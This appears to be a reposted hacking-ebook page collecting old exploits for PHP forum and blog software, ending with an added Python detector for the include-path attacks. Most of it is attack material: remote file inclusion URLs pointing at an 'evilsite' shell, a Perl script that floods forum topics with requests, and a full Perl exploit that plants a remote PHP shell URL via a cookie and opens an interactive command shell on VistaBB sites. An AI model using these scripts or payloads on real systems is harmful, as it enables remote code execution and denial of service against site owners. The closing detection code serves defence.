Hacker Professional Ebook part 437 ppt

black_hat_cr(HCE)

vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

Code:

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Download = http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

-

-

- Vulnerable Code

include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?

http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?

Black_hat_cr(HCE)

vBulletin 3.5.4 (install_path) Exploit

by: CarcaBot

-

application : vbulletin

-

URL : http://www.vbulletin.com

-

Exploit:

http://www.vicitimsite.com/forumpath =http://CarcaBot.Ro

-

More Details:

Dump SQL DB named user then u have access at all md5 users passwords

vns3curity(HCE)

View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

Copied material

Code:

#!/usr/bin/perl

print q{

_

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>

/ \

\ \ ,, / /

'-.`\()/`.-'

. _'( )'_

/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *

| | >< | |

\ \ / /

'. .'

=> View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

=> Sito: www.spiderz.altervista.org

=> Sito2: www.spiderz.netsons.org

=> Author: SpiderZ

=> Bug trovato da Gaggo, Exploit creato da SpiderZ

_

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>

};

use IO::Socket;

print q{

-

=> Exploit created by: SpiderZ

=> Inserisci l'url del sito

=> senza inserire ( www - HTTP )

=> };

$host = <STDIN>;

chop ($host);

print q{

-

=> Indica la cartella

=> cartella: ( /Forum/ )

=> };

$pth = <STDIN>;

chop ($pth);

print q{

-

=> phpBB ( viewtopic.php?t= )

=> MercuryBoard ( index.php?a=topic&t= )

=> Vbulletin ( showthread.php?t= )

=> Ipb ( index.php?showtopic= )

=> };

$t = <STDIN>;

chop ($t);

print q{

-

=> Numero Topic

=> Es: viewtopic.php?t=1 ( 1, 2, 3, ecc )

=> };

$topic = <STDIN>;

chop ($topic);

print q{

-

=> Quante volte vuoi fare il flood ? ( 1 / 10000 )

=> };

$while = <STDIN>;

chop ($while);

while($x != $while )

{

$lrg = length $postit;

my $sock = new IO::Socket::INET

(

PeerAddr => "$host",

PeerPort => "80",

Proto => "tcp",

);

die "\nThe Socket: $!\n" unless $sock;

print $sock "POST $pth"."$t$topic HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Referer: $host\n";

print $sock "Connection: Keep-Alive\n";

print $sock "Cache-Control: no-cache\n";

print $sock "Content-Length: $lrg\n\n";

print $sock "$postit\n";

close($sock);

syswrite STDOUT, ".";

$x++;

}

print q{

-

=> Attacco Completato !

=> www.spiderz.tk

-

};

black_hat_cr(HCE)

VistaBB <= 2.x Multiple File Inclusion

Exploit in Perl:

Quote:

#!/usr/bin/perl

# Method found and exploit scripted by nukedx

# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com

# Original advisory can be found at: http://www.nukedx.com/?viewdoc=48

#

# VistaBB <= 2.x Remote Command Execution Exploit

#

# This exploit comes with it's own php shell setting If you wanna change it your file must contain this data >

#

# <?php

# echo "_START_\n";

# ini_set("max_execution_time",0);

# error_reporting(0);

# passthru($_REQUEST[command]);

# echo "\n_END_";

# ?>

#

# Copyright 2006 (C) nukedx

#

# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends

use IO::Socket;

# Default configuration

$shell = "http://hometown.aol.com/yarivgiladi/sh.php";

# Checking user settings

if(@ARGV != 2) { usage(); }

else { exploit(); }

sub header()

{

print "\n- NukedX Security Advisory Nr.2006-44\r\n";

print "- VistaBB <= 2.x Remote Command Execution Exploit\r\n";

}

sub usage()

{

header();

print "- Usage: $0 <host> <path>\r\n";

print "- <host> -> Victim's host ex: www.victim.com\r\n";

print "- <path> -> Path to VistaBB ex: /vistabb/ or just /\r\n";

exit();

}

sub exploit() {

# User variables

$host = $ARGV[0];

$host =~ s/(http:\/\/)//eg;

$target = $ARGV[1]."includes/functions_mod_user.php";

$good = 0;

$c2s = "command=whoami";

$c2slen = length($c2s);

print "Trying to connect: $host\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed \r\n";

print "Connected to victim: $host\r\n";

print $sock "POST $target HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Accept: */*\n";

print $sock "Referer: $host\r\n";

print $sock "Accept-Language: tr\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\r\n";

print $sock "Accept-Encoding: gzip, deflate\r\n";

print $sock "User-Agent: NukeZilla\r\n";

print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";

print $sock "Content-length: $c2slen\r\n";

print $sock "Connection: Keep-Alive\r\n";

print $sock "Cache-Control: no-cache\r\n\r\n";

print $sock $c2s;

print $sock "\r\n\r\n";

while($result = <$sock>)

{

if($result =~ /^_END_/)

{

$good=0;

close($sock);

}

if($good==1)

{

if (!$whoami) {

$whoami = trim($result);

print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";

}

}

if ($good==0)

{

if ($result =~ /Warning: include_once/) { print "Sorry victim is not

vulnerable \r\nClosing exploit \r\n";sleep(3);exit(); }

}

if($result =~ /^_START_/)

{

$good=1;

}

}

while()

{

print "[".$whoami."@".$host." /]\$ ";

while(<STDIN>)

{

$cmds=$_;

chomp($cmds);

last;

}

if ($cmds =~ /^exit/) { print "Closing exploit \r\n";sleep(3);exit(); }

else { sendcmd(); }

}

}

sub sendcmd () {

$c2s = "command=".$cmds;

$c2slen = length($c2s);

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost \r\n";

print $sock "POST $target HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Accept: */*\n";

print $sock "Referer: $host\r\n";

print $sock "Accept-Language: tr\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\r\n";

print $sock "Accept-Encoding: gzip, deflate\r\n";

print $sock "User-Agent: NukeZilla\r\n";

print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";

print $sock "Content-length: $c2slen\r\n";

print $sock "Connection: Keep-Alive\r\n";

print $sock "Cache-Control: no-cache\r\n\r\n";

print $sock $c2s;

print $sock "\r\n\r\n";

while($result = <$sock>)

{

if($result =~ /^_END_/)

{

$good=0;

close($sock);

}

if($good==1)

{

print $result;

}

if ($good==0)

{

if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched! \r\nClosing exploit \r\n";sleep(3);exit(); }

}

if($result =~ /^_START_/)

{

$good=1;

}

}

}

sub trim($)

{

my $string = shift;

$string =~ s/^\s+//;

$string =~ s/\s+$//;

return $string;

}
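
Detection logic for the two include-path overrides shown on this page (`cfgProgDir` in the query string, `phpbb_root_path` in a cookie), added here as an example and not part of the original posts: it flags any client-supplied value for those variables and decodes nested percent-encoding before checking for a remote URL. The request records, the `attacker.example` host and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include-path variables named in the two advisories above; extend per application.
WATCHED = {"cfgprogdir", "phpbb_root_path"}
# URL schemes and PHP stream wrappers that never belong in an include directory.
REMOTE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)\s*:", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %2568ttp:// is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def parameters(target, cookie_header):
    """Yield (source, name, value) for each query-string and cookie parameter."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        yield "query", name, value
    for pair in cookie_header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            yield "cookie", name, value

def scan(requests):
    """Return (index, source, name, verdict) for every client-supplied watched variable."""
    findings = []
    for index, (target, cookie_header) in enumerate(requests):
        for source, name, value in parameters(target, cookie_header):
            if name.lower() not in WATCHED:
                continue
            verdict = "remote-include" if REMOTE.match(fully_decode(value)) else "config-override"
            findings.append((index, source, name, verdict))
    return findings

# Constructed sample requests: (request target, Cookie header value).
SAMPLE = [
    ("/blog/admin/auth/secure.php?cfgProgDir=http://attacker.example/s.txt?", ""),
    ("/blog/admin/auth/checklogin.php?cfgProgDir=%2568ttp%3A%2F%2Fattacker.example%2Fs%3F", ""),
    ("/forum/includes/functions_mod_user.php", "sid=abc; phpbb_root_path=http://attacker.example/s.txt?"),
    ("/forum/viewtopic.php?t=12", "sid=abc"),
    ("/blog/index.php?cfgProgDir=./lib/", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `config-override` verdict is worth alerting on as well: these variables are meant to be set by the application's own configuration, so any value arriving from a request indicates the script is being called outside its intended include chain.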

Posted: 04/07/2014, 12:20